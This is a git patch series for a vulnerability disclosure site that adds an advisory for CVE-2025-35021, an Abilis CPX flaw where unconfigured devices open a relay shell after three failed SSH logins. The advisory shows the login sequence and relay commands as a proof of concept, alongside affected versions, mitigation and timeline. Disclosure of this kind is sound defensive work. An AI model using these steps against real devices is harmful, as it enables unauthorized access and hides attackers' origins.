From 2e83c655377aa04ef2c67537fbd0a9622be4c188 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Wed, 1 Oct 2025 15:09:09 -0400 Subject: [PATCH 1/4] Grr typo on bold Signed-off-by: Tod Beardsley --- content/cve.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/content/cve.md b/content/cve.md index 4767189..92f8b72 100644 --- a/content/cve.md +++ b/content/cve.md @@ -210,7 +210,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste. | CVE | Meeting | Issue | GCVE | | ----------------- | --------- | ------------------------------------------ | ---- | | [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] | -| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection ** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | +| [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | ## Reserved GCVEs From 76712bb38a3c3b5bb840be13776e49d7e5196d2b Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Fri, 31 Oct 2025 10:27:56 -0500 Subject: [PATCH 2/4] Reserve GCVE for upcoming disclosure Signed-off-by: Tod Beardsley --- content/cve.md | 1 + 1 file changed, 1 insertion(+) diff --git a/content/cve.md b/content/cve.md index 92f8b72..7d8b8fd 100644 --- a/content/cve.md +++ b/content/cve.md @@ -224,6 +224,7 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | +| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 | From 24b86a8f90b48b3627aa44e12c63587532606130 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 3 Nov 2025 18:09:56 -0600 Subject: [PATCH 3/4] Add HD's thing Signed-off-by: Tod Beardsley --- content/cve.md | 4 +- content/cves/CVE-2025-35021.md | 129 +++++++++++++++++++++++++++++++++ 2 files changed, 132 insertions(+), 1 deletion(-) create mode 100644 content/cves/CVE-2025-35021.md diff --git a/content/cve.md b/content/cve.md index 7d8b8fd..23be972 100644 --- a/content/cve.md +++ b/content/cve.md @@ -211,6 +211,7 @@ When we publish CVEs, we will tend to use this [template], adjusted to taste. | ----------------- | --------- | ------------------------------------------ | ---- | | [CVE-2025-8452] | 0x00e2 | **Brother Printer Serial Number Disclosure** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001] | | [CVE-2025-35027] | 0x00e4 | **Unitree Robotics Command Injection** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010] | +| [CVE-2025-35021] | 0x00e5 | **Abilis CPX Fallback Shell Connection Relay** | [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] | ## Reserved GCVEs @@ -224,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | -| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 | @@ -273,5 +273,7 @@ Vulnerabilities involving other parties must be either (1) presented at a regula [CVE-2025-35010]: {{< baseurl >}}cves/cve-2025-35010/ [CVE-2025-8452]: {{< baseurl >}}cves/cve-2025-8452/ [CVE-2025-35027]: {{< baseurl >}}cves/cve-2025-35027/ +[CVE-2025-35021]: {{< baseurl >}}cves/cve-2025-35021/ [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111011111010111111001000000000000000000000000000000000000000000000000000000001 [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011011111110011111111110000000000000000000000000000000000000000000000000000000010 +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 diff --git a/content/cves/CVE-2025-35021.md b/content/cves/CVE-2025-35021.md new file mode 100644 index 0000000..4ede489 --- /dev/null +++ b/content/cves/CVE-2025-35021.md @@ -0,0 +1,129 @@ +--- +title: CVE-2025-35021 +aliases: + - /cves/CVE-2025-35027.html + - /gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 +publishDate: 2025-11-03T18:06:00-06:00 + +--- + +## CVE-2025-35021: Abilis CPX Fallback Shell Connection Relay + +[AHA!] has discovered an issue with Abilis CPX devices, and is publishing this disclosure in accordance with runZero's standard [disclosure policy] today, November 3, 2025. [CVE-2025-35021] has been assigned to this issue. Any questions about this disclosure should be directed to cve@takeonme.org. + +The [GCVE](https://gcve.eu/about/) identifier for this issue is [GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100] + +# Executive Summary + +By failing to authenticate three times to an unconfigured Abilis CPX device via SSH, an attacker can login to a restricted shell on the fourth attempt, and from there, relay connections. This issue is an instance of [CWE-1188](https://cwe.mitre.org/data/definitions/1188.html), 'Initialization of a Resource with an Insecure Default,' and is estimated to have a CVSS 3.1 score of [6.5](https://www.first.org/cvss/calculator/3-1#CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N) (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N). The relevant [SSVC] vectors for this vulnerability are *Exploitation: PoC* and *Technical Impact: Partial*. + +# Technical Details + +A number of Abilis CPX devices drop to a fallback shell after three unsuccessful login attempts, if the device is not already configured with an SSH password. This shell allows outbound sessions from the device. + +In the example console session below, three known-incorrect logins (`bad`) are offered to an affected device before being dropped to the `SSHS` prompt. + +``` +$ ssh root@[TARGET] +root@TARGET's password: + +COM + +Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 - Abilis ID NNNNNNN +Tuesday 19/08/2025 06:07:48 (UTC+02:00) - UpTime 2 days 11:20:42 +Login: bad + +PERMISSION DENIED + +Login: bad + +PERMISSION DENIED + +Login: bad + +PERMISSION DENIED + + +CLR F0 AE + +[192.168.11.002] SSHS> +``` + +At this point, we are in the `SSHS` shell. This is a restricted shell, though it can be used as a relay to other systems. The below example uses the `SSHC` shell: + +``` +[192.168.11.002]help +CP Open connection to local CP resource +SSH Open connection to local SSH client +TELNET Open connection to local TELNET client +- Open X25 call with CD and UD +CLR Close connection +CLOSE Close SSH Session +EXIT Close SSH Session +HELP Show current help +[192.168.11.002] SSHS>SSH +[192.168.11.002] SSHC> +[192.168.11.002] SSHC>OPEN 8.8.8.8:53 +Trying 8.8.8.8:53 ... Open + +Version identification fault +``` + +Similar to the `SSHC` shell, the `TELNETC` shell offers another path to connection relaying, and does not require the service to handshake a particular way: +``` +[192.168.11.002] SSHS>TELNET +[192.168.11.002] TELNETC> +[192.168.11.002]TELNETC>open 1.2.3.4:5678 +Trying 1.2.3.4:5678 ... Open +``` + +## Affected Products + +Affected versions of CPX devices include: + +* Abilis CPX - Ver. 7.4.10/STD - Build 3608.48 +* Abilis CPX - Ver. 8.10.2/STD - Build 4703.15 - Branch 8.10 +* Abilis CPX - Ver. 8.10.4/STD - Build 4703.26 - Branch 8.10 +* Abilis CPX - Ver. 8.11.0/STD - Build 4715.15 - Branch 8.11 +* Abilis CPX - Ver. 8.11.11/STD - Build 4715.52 - Branch 8.11 +* Abilis CPX - Ver. 8.11.14/STD - Build 4715.57 - Branch 8.11 +* Abilis CPX - Ver. 8.11.2/STD - Build 4715.19 - Branch 8.11 +* Abilis CPX - Ver. 8.11.5/STD - Build 4715.28 - Branch 8.11 +* Abilis CPX - Ver. 9.0.0/STD - Build 4957.3 - Branch 9.0 + +Across these devices, affected SSH banners include: + +* SSH-1.99-CPX SSH Server +* SSH-2.0-CPX SSH Server + +## Mitigation + +According to the vendor, setting a password to the SSH service will effectively remedy this behavior. Furthermore, firmware version 9.0.7 has been released so users can no longer accidentally expose an effectively no-authentication relay service. + +# Attacker Value + +By providing a pivot point to relay connections, attackers can use affected CPX devices to effectively shield their true originating IP address when launching attacks against other targets. + +# Credit + +This issue was discovered by [HD Moore](https://www.runzero.com/authors/hd-moore) and disclosure was coordinated by [Tod Beardsley](https://www.runzero.com/authors/tod-beardsley/) through the [AHA!] CNA. + +# Timeline + +* 2025-08-09 (Sat): Briefly demoed at [Def Con 33] in the presentation, [Shaking Out Shells with SSHamble] +* 2025-08-19 (Tue): Initial contact to the vendor at info@antek.it +* 2025-08-20 (Wed): Provided technical details to the vendor +* 2025-08-22 (Fri): Vendor acknowledged the vulnerability as a configuration issue +* 2025-10-21 (Tue): Vendor released [Abilis firmware update 9.0.7](https://support.abilis.net/relnotes/cpx2k/R9.0.html#R9.0.7) +* 2025-10-30 (Thu): Findings presented at AHA! Meeting 0x00e5 and [CVE-2025-35021] reserved +* 2025-11-03 (Mon): This public disclosure + +---- + +[AHA!]: https://takeonme.org +[disclosure policy]: https://takeonme.org/cve.html +[CVE-2025-35021]: https://www.cve.org/CVERecord?id=CVE-2025-35021 +[SSVC]: https://www.cisa.gov/stakeholder-specific-vulnerability-categorization-ssvc +[Def Con 33]: https://www.youtube.com/watch?v=XHoH4ic8fX8 +[Shaking Out Shells with SSHamble]: https://www.runzero.com/def-con-33-hd-moore/ +[GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100]: {{< baseurl >}}gcves/GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 From 0bcbe63f89674c7cdd4c52867e066a1538658353 Mon Sep 17 00:00:00 2001 From: Tod Beardsley Date: Mon, 3 Nov 2025 18:14:14 -0600 Subject: [PATCH 4/4] Update reserved GCVE table Signed-off-by: Tod Beardsley --- content/cve.md | 1 - 1 file changed, 1 deletion(-) diff --git a/content/cve.md b/content/cve.md index 2903f9b..23be972 100644 --- a/content/cve.md +++ b/content/cve.md @@ -225,7 +225,6 @@ That said, starting in August of 2025, we've started to reserve [GCVEs](https:// | Meeting | GCVE (Reserved) | |---------|-----------------| | 0x00e4 | GCVE-1337-2025-00000000000000000000000000000000000000000000000000111111111111111111111111000000000000000000000000000000000000000000000000000000011 | -| 0x00e5 | GCVE-1337-2025-00000000000000000000000000000000000000000000000001011111111111011111111110000000000000000000000000000000000000000000000000000000100 |